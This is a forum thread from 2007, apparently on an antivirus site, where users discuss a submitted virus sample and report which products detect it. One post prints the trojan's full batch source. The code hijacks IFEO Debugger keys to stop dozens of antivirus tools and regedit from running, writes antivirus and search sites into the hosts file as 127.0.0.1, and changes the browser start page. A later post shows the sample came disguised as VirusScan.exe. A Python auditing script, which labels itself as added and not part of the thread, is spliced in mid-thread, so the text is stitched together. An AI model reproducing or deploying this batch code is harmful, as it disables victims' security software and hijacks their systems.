Thread starter: 金剑

[Virus sample] I'm JJ

bb624
Posted on 2007-5-13 17:39:05
It gets past quite a few; so far it bypasses Kaspersky, Avira, Dr.Web and NOD.
金剑
Thread starter | Posted on 2007-5-13 18:19:39
Submitting it now.
小邪邪
Posted on 2007-5-13 18:26:00
McAfee didn't detect it.

AVK did.
solcroft
Posted on 2007-5-13 18:27:12
What is this thing? It actually pings the homepage of 风暴胜者 (Storm Winner)?
It looks like a malicious batch file: it changes the system date, adds IFEO registry entries and modifies the hosts file, but the author isn't very skilled and ended up writing a useless thing that has no effect...

@ECHO OFF
date 1993-1-1
ping www.v0day.com
del c:\u.vbe
echo. wscript.createobject("wscript.shell").run """Call.bat"" /start",0 >> c:\u.vbe
set name=Call
copy %0 C:\Program Files\Outlook Express\%name%.bat
copy %0 C:\Call.bat
copy C:\WINDOWS\system32\ctfmon.exe C:\WINDOWS\system32\ctfm0n.exe
set lujing=C:\Call.bat
set KEY2=CurrentVersion\Image File Execution Options
set KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\%KEY2%
reg add "%KEY%\Mcshield5.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\VsTskMgr.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\naPrdMgr.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\UpdaterUI.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\TBMon.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\scan32.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\Ravmond.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\CCenter.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\RavTask.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\Rav.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\Ravmon.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\RavmonD.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\RavStub.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\KVXP.kxp" /v Debugger /d %lujing% /f
reg add "%KEY%\kvMonXP.kxp" /v Debugger /d %lujing% /f
reg add "%KEY%\KVCenter.kxp" /v Debugger /d %lujing% /f
reg add "%KEY%\KVSrvXP.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\360safe.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\360rpt.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\KRegEx.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\UIHost.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\TrojDie.kxp" /v Debugger /d %lujing% /f
reg add "%KEY%\FrogAgent.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\regedit.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\Regedt32.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\修复工具.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\freepp.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\free.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\Kav.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\avp.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\kavsvc.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\icesword.exe" /v Debugger /d %lujing% /f
reg add "%KEY%\ctfmon.exe" /v Debugger /d wscript.exe c:\u.vbe /f
C:\WINDOWS\system32\ctfm0n.exe
%BV20082% 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.baidu.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.jiangmin.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.baidu.cn >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.kingsoft.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.rising.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.rising.com.cn >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.mmsk.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 shadu.baidu.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 online.rising.com.cn >> %windir%\system32\drivers\etc\hosts

set zhuye=Start P
set ceye=ge_URL
set sdfds=HKEY_CURRENT_USER
set ause=\Microsoft\Internet

reg add "%sdfds%\Software%ause%Explorer\Main" /v "%zhuye%age" /t reg_sz /d http://bbs1.xinwen520.com/ /f
reg add "%sdfds%\Software%ause%Explorer\Explorer\Main" /v "Default_Pa%ceye%" /t reg_sz /d http://bbs1.xinwen520.com/ /f
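The two persistence and blocking tricks in the batch above (IFEO `Debugger` entries and loopback entries in the hosts file) are easy to audit from a `reg export` dump and a copy of the hosts file. This is an added defender-side example, not code from the thread; the registry dump and hosts file below are constructed to mirror the sample's changes, and the tool only parses text, so it runs offline on any platform.

```python
import re

# Registry path the sample writes to, and hostnames a hosts file legitimately pins to loopback.
IFEO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}
# Constructed `reg export` output and hosts file mirroring the sample's changes (not from a real host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ravmon.exe]
"Debugger"="C:\\Call.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe]
"Debugger"="wscript.exe c:\\u.vbe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000000
'''
SAMPLE_HOSTS = """# constructed hosts file
127.0.0.1 localhost
127.0.0.1 www.kaspersky.com   # AV update site sinkholed
127.0.0.1 online.rising.com.cn
"""
def ifeo_debuggers(reg_dump: str) -> dict:
    """Map image name -> Debugger value for every IFEO subkey that sets one.
    Any Debugger entry redirects launches of that image, so each hit needs review."""
    hits, image = {}, None
    for line in reg_dump.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            prefix = IFEO_KEY.lower() + "\\"
            image = key[len(prefix):] if key.lower().startswith(prefix) else None
            continue
        m = re.match(r'"Debugger"="(.*)"$', line)
        if m and image:
            hits[image] = m.group(1).replace("\\\\", "\\")  # undo reg export escaping
    return hits

def sinkholed_hosts(hosts_text: str) -> list:
    """Hostnames pinned to loopback, minus the standard local names."""
    out = []
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        addr, names = fields[0], fields[1:]
        if addr.startswith("127.") or addr == "::1":
            out.extend(n for n in names if n.lower() not in LOCAL_NAMES)
    return out
```

On a real machine, feed `ifeo_debuggers` the output of `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg` (saved as text) and `sinkholed_hosts` the contents of `%windir%\system32\drivers\etc\hosts`; a Debugger pointing at a .bat, .vbe or a renamed copy of a system binary is the pattern this sample leaves behind.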
金剑
Thread starter | Posted on 2007-5-13 18:34:20
PS 2008??
ping www.v0day.com???
jlennon
Posted on 2007-5-13 18:50:10
[attachment: login required to view]
dikex
Posted on 2007-5-13 18:50:56
A very boring batch file.
The EQs
Posted on 2007-5-13 18:51:27
Just submit it to ESET...... let them analyse it...
dikex
Posted on 2007-5-13 19:28:13
Originally posted by EQ2 on 2007-5-13 18:51:
Just submit it to ESET...... let them analyse it...

I'd rather not. This thing isn't written in assembly at all; it's just a VBS plus a bat that errors out, packed into a WinRAR self-extracting archive. There's no technical skill in it whatsoever.
caocao
Posted on 2007-5-13 19:34:18
KIS621
已删除: 木马程序 Trojan.BAT.Agent.r        文件: D:\Downloads\VirusScan.rar/VirusScan.exe//data.rar/Call.bat
已删除: 木马程序 Trojan.BAT.Agent.r        文件: D:\Downloads\VirusScan.rar/VirusScan.exe//data.rar/u.vbe